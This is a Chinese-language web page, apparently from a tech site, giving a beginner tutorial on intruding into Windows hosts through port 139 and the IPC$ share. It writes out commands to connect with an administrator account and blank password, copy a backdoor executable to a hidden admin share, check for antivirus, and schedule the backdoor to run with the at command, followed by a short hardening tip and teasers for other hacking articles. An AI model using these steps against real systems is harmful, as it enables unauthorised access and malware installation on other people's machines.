连接139端口的命令是什么?怎么通过139端口入侵网站?
net use\\192.168.0.1\ipc$Content$nbsp;"" /user:administrator
提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。
首先,连接的命令是:
net<空格>use<空格>\\IP地址\ipc$Content$lt;空格>密码<空格>/user:用户名
假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的:
netuse \\192.168.1.11\ipc$Content$nbsp;123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"!
空密码是这样的:
如果密码是空的,那就在原先输入密码的地方以""代替。
开始查看权限:
查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的:
copy<>文件绝对路径<>\\IP地址\文件目标路径
比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下:
copy c:\a.exe \\192.168.1.11\d$Content$nbsp;
要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。如果命令执行成功,系统同样会提示"已复制 1 个文件"
小技巧:
再次复制相同文件至相同路径,以检测是否存在杀毒软件!!!
如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。如果没有提示,则说明安装了杀毒软件。
查看目标系统时间,准备使用at任务计划运行程序。
命令格式:
net<空格>time<空格>\\IP地址
例子:
net time\\192.168.1.11
系统会返回目标的当前时间,时间显示后,AT任务计划命令需要使用24小时制。比如系统显示“\\192.168.1.11 的当前时间是 2006/5/10 下午 06:02”在使用到AT任务计划命令时,这个“下午06:02”就需要换算成“18:02”!
使用AT命令为目标系统添加任务计划:
格式:
at<空格>\\IP地址<空格>指定运行时间<空格>需要运行的文件路径名
例子:
at \\192.168.1.1118:20 d:\a.exe
IPC通道入侵就目前来看已经是一个非常老的攻击手段了,现在针对IPC通道的防御手段也越来越多,越来越简单。但如果一个攻击者成功获得了IPC通道的一个System权限,那对于被攻击的系统来说无意是致命的。
所以,建议用户将Server服务关闭,信使服务与Task Scheduler服务(计划任务)也都关闭,这样可以较全面的保护计算机在IPC通道方面的安全。
黑客入侵网站的基本步骤 网络服务器的入侵方法
尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性,然而由于系统管理员的水平参差不齐或安全意识底下,往往给黑客提供了入侵的机会。其实每一个黑客都有自己独到的方法。笔者对于入侵网站服务器的资
详情2018-01-07 16:30:26责编:llp 来源:驱动管家openbsd是什么?openbsd系统有什么漏洞?
受影响系统:OpenBSD OpenBSD 4 2OpenBSD OpenBSD 4 1OpenBSD OpenBSD 4 0描述:BUGTRAQ ID: 25984CVE(CAN) ID: CVE-2007-5365OpenBSD是一款开放源代码Unix类操作系统。OpenBSD系统的DHCP协议实现上存
详情2018-01-24 16:40:45责编:llp 来源:驱动管家检查出使用窗口的特定程序的第一步是查看端口是否开放
在局域网使用中,我们常常会发现系统中开放了一些莫名其妙的端口,这就给系统的安全带来了一些隐患。为了让端口的使用尽在掌握之中,一些朋友就会使用第三方工具来进行检查出使用端口的特定程序究竟是谁,但实际
详情2018-01-22 09:02:10责编:llp 来源:驱动管家网络安全知识 揭秘网络安全的五个误区
网络安全越来越成为一个大问题,网络安全事故和个人隐私数据泄露的频发,我们不得不对自己的信息加以保护,一起来看看网络安全自己的一系列误区吧。选择一个话题,什么话题都行,始终有一些人信以为真的误区和无
详情2018-01-08 17:58:17责编:llp 来源:驱动管家入侵复旦大学的经历记录 一起来看看怎么入侵复旦大学
一、师出有名某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为
详情2018-01-30 08:52:13责编:llp 来源:驱动管家网站挂马检测 麦咖啡vse 8.5服务器如何查找挂马?
正好今天在查看服务器日志的时候 发现McAfee又一次成功的拦截了挂马,特给大家分享下。重点:单单的防还是不能解决问题,下面是我们找出真凶了给大家介绍一个工具可以像MMC计算机管理管理单元中的“会话”文件夹,
详情2018-01-31 08:52:44责编:llp 来源:驱动管家为什么有lcx工具?lcx工具的使用方法是什么?
1 首先我们要知道为什么有lcx这个工具?存在即合理,它的出现肯定是为了达到什么目的,达到什么目的呢?看看下图,上面明确说明了使用方法:第一条指令:lcx exe –listen本机连接端口转发到端口;第二条很
详情2018-02-10 09:34:19责编:llp 来源:驱动管家怎么获取webshell后门密码?获取webshell后门密码的步骤
下面简单的揭露下怎么获取webshell后门密码google:TNTHK小组内部版文字版:点开webshell输入任意mima提示错误在提示错误页面右键源代码ctrl+f passwordfont后跟的就是webshell密码图文版本:1 在password登陆
详情2018-02-05 12:01:57责编:llp 来源:驱动管家什么是dns漏洞?模拟dns缓存毒药攻击的步骤
如果你访问大型知名网站打开的却是病毒网站,如果你访问网银的官方网站打开的却是假冒网银页面,如果访问的是正规网站打开的却是色情网站……这些情况听起来不可思议,输入的网址是正确的为什么打开的却是其他网
详情2018-02-07 10:01:55责编:llp 来源:驱动管家流氓软件怎么篡改ie浏览器主页?
这说明这个流氓软件在注册表里还有别的窠,这些可能位置都有哪些呢?笔者根据有限经验,先列出最重要的这几条,期待网友们补充更多的发现。点击开始-运行-输入regedit回车,依次找到如下位置——当然,笔者推荐
详情2018-01-14 09:53:14责编:llp 来源:驱动管家
- adsl猫连不上是怎么回事?adsl猫连不上网是哪儿出了故障?
- marvelous designer有破解版吗?marvelous designer怎么破解?
- 奇趣果网络摄像机到底好不好呢?奇趣果网络摄像机的相关介绍
- 专业高清摄像机买什么好?松下专业高清摄像机推荐
- 搜狗高速浏览器设置主页的方法介绍
- 电脑操作五种常用的密码设置方法以及密码破解方法介绍
- vivo x9 plus的续航能力 vivo x9 plus暴力耗电实测
- vivo x3t怎么用?知道这21个技巧帮你灵活使用vivo x3t
- 为什么cf进不去游戏?cf进不去游戏怎么解决?
- phpwcms1.2系统的漏洞公告 怎么利用漏洞公告入侵网站?
- 迅雷崩溃怎么办?迅雷崩溃的原因是什么?
- 微信二维码样式可以自定义吗?怎样更换微信二维码样式?
- 什么数码摄像机比较好?数码摄像机排行榜
- 什么迷你dv摄像机比较好用?迷你dv摄像机的用法介绍
- 如何创建本地连接?桌面本地连接快捷方式怎么创建
- Word文档页边距怎么设置?打印文档时页边距如何设置?
- 最美的手机vivo x5max主打hifi音乐功能
- 三星galaxy s7跑了多少分?三星galaxy s7安兔兔跑分成绩是多少?
- 插到电脑上的U盘为什么不显示?U盘不显示怎么办?
- 利用winnt对象不靠cmd命令添加一个管理员的具体代码